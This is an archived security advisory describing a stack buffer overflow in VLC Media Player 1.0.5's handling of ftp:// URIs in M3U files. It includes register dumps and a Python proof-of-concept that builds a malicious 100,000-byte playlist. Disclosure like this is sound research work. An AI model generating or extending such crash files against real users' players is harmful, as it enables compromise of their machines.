AOH :: HP Unsorted V :: B1A-1413.HTM

VLC Player M3U file ftp:// URI Handler Remote Stack Buffer Overflow



VLC Player M3U file ftp:// URI Handler Remote Stack Buffer Overflow
VLC Player M3U file ftp:// URI Handler Remote Stack Buffer Overflow



There a Vulnerability in VLC Media Player v1.0.5 (Goldeneye) when handling M3U files with ftp:// URI handler.=0D
=0D
When we open the malicious file our EDX and EBP registers point to the user supplied data which might lead to code execution.=0D
State of the registers when we opne the malicious file is:=0D
=0D
EAX 00000000=0D
ECX 7008A2B7 ASCII ";type="=0D
EDX 01DC743B ASCII "=0D
ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ=0D
EBX 01C8C120=0D
ESP 0324FB78=0D
EBP 01D19008 ASCII "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD=0D
ESI 00000000=0D
EDI 00000000=0D
EIP 77C47C7E msvcrt.77C47C7E=0D
C 0  ES 0023 32bit 0(FFFFFFFF)=0D
=0D
=0D
Attaching image for above stack trace and PoC script.=0D
=0D
#############START PYTHON########################=0D
import sys=0D
import string=0D
=0D
print "\n\n***VLC Player M3U file ftp:// URI Handler Remote Stack Buffer Overflow***\n"=0D
=0D
#Tested on Microsoft Windows XP Professional SP3=0D
# Application Vulnerable: VLC Media Player v1.0.5 (Goldeneye)=0D
# Not Vulnerable: VLC Media Player v1.1.0 (The Luggage), Checked on windows 7=0D
=0D
#edx register points to our data afetr 4255 bytes=0D
buf1 = "ftp://" + "PRAV" + "\x44" * 4251=0D 
buf2 = buf1 + "A" * 4=0D
buf3 = buf2 + "Z" * (100000-4259)=0D
=0D
print "100000-4259 is: ", 100000-4259=0D
print "Creating malicious M3U file . . .\n"=0D
=0D
filem3u=open('m3uftp.m3u','w')=0D
filem3u.write(buf3)=0D
filem3u.close()=0D
=0D
print "Created M3U file. Open with VLC Media Player v1.0.5 (Goldeneye)\n\n"=0D
=0D
=0D
=0D
'''=0D
EAX 00000000=0D
ECX 7008A2B7 ASCII ";type="=0D
EDX 01DC743B ASCII "ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ=0D
EBX 01C8C120=0D
ESP 0324FB78=0D
EBP 01D19008 ASCII "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD=0D
ESI 00000000=0D
EDI 00000000=0D
EIP 77C47C7E msvcrt.77C47C7E=0D
C 0  ES 0023 32bit 0(FFFFFFFF)=0D
=0D
=0D
'''=0D
#Hi to all Indian Hacker$, Andhra/ Telangana Hacker$ ;)=0D
# Praveen Darshanam=0D
#############END PYTHON###########################=0D
Hi to all Indian Hacker$, Andhra/ Telangana Hacker$ ;)=0D
=0D
Best Regards,=0D
Praveen Darshanam,=0D
Security Researcher

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.